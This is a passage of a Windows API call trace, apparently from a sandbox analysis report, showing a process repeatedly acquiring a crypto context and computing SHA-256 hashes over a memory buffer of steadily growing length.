(in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.279] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0151.279] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61c10 [0151.279] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.279] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.279] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.279] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.279] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0151.279] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61790 [0151.279] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.279] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.280] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0151.280] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.280] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x800, dwFlags=0x0) returned 1 [0151.280] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61c40 [0151.280] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.280] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0151.280] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.281] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.281] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x820, dwFlags=0x0) returned 1 [0151.281] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62270 [0151.281] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.281] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.281] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.281] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.281] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x840, dwFlags=0x0) returned 1 [0151.281] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e618e0 [0151.281] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.282] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.282] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.282] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.282] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x860, dwFlags=0x0) returned 1 [0151.282] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62150 [0151.282] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.282] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.282] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.283] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.283] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x880, dwFlags=0x0) returned 1 [0151.283] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61d00 [0151.283] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.283] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.283] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.283] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.283] CryptHashData (hHash=0x332b7820, pbData=0x32e5fa80, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0151.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61df0 [0151.284] CryptDestroyHash (hHash=0x332b7820) returned 1 [0151.284] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.284] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.284] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.284] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0151.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61af0 [0151.284] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.284] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.284] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0151.285] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.285] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0151.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61d90 [0151.285] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.285] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0151.285] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0151.286] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.286] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x900, dwFlags=0x0) returned 1 [0151.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e619d0 [0151.286] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.286] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0151.286] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.286] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.286] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x920, dwFlags=0x0) returned 1 [0151.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61ee0 [0151.286] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.286] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.286] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.287] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.287] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x940, dwFlags=0x0) returned 1 [0151.287] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61cd0 [0151.287] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.287] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.287] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.288] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.288] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x960, dwFlags=0x0) returned 1 [0151.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61ac0 [0151.288] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.288] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.288] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.288] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.288] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x980, dwFlags=0x0) returned 1 [0151.288] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e617c0 [0151.288] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.288] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.289] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0151.289] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.289] CryptHashData (hHash=0x332b7820, pbData=0x32e5fa80, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0151.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61ca0 [0151.289] CryptDestroyHash (hHash=0x332b7820) returned 1 [0151.289] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0151.289] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0151.290] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.290] CryptHashData (hHash=0x332b7890, pbData=0x32e5fa80, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0151.290] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61f10 [0151.290] CryptDestroyHash (hHash=0x332b7890) returned 1 [0151.290] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0151.290] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.290] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.290] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0151.290] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62180 [0151.291] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.291] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.291] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0151.291] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.291] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0151.291] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61be0 [0151.291] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.291] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0151.291] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0151.292] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.292] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0151.292] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62030 [0151.292] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.292] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0151.292] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.292] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.293] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0151.293] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61fa0 [0151.293] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.293] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.293] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0151.293] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.293] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0151.293] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61910 [0151.293] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.293] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0151.293] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.294] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.294] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0151.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61c70 [0151.294] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.294] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.294] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.295] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.295] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0151.295] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e617f0 [0151.295] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.295] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.295] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0151.295] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.295] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0151.295] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61730 [0151.295] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.295] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0151.296] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0151.296] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.296] CryptHashData (hHash=0x332b7890, pbData=0x32e5fa80, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0151.296] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61e20 [0151.296] CryptDestroyHash (hHash=0x332b7890) returned 1 [0151.296] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0151.296] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.297] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.297] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0151.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61dc0 [0151.297] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.297] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.297] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.298] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.298] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0151.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e620f0 [0151.298] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.298] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.298] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0151.298] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.298] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0151.299] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e62060 [0151.299] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.299] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0151.299] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.300] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.301] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0151.301] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e622d0 [0151.301] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.301] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.302] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.304] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.304] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0151.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61d60 [0151.304] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.304] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.305] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.306] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.306] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0151.306] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61b20 [0151.306] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.306] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.306] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0151.307] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.307] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0151.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e622a0 [0151.307] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.307] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0151.307] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0151.308] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.308] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0151.308] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61e50 [0151.308] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0151.308] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0151.308] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.309] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.309] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0151.309] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61820 [0151.309] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.309] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.309] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0151.310] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.310] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0151.310] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61e80 [0151.310] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.310] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0151.310] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.311] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.311] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0151.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61fd0 [0151.311] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.311] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.311] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.312] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.312] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0151.312] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e620c0 [0151.312] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.312] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.312] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.313] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.313] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0151.313] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e621e0 [0151.313] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.313] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.313] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.314] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.314] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0151.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61eb0 [0151.314] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.314] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.314] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0151.315] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.315] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, 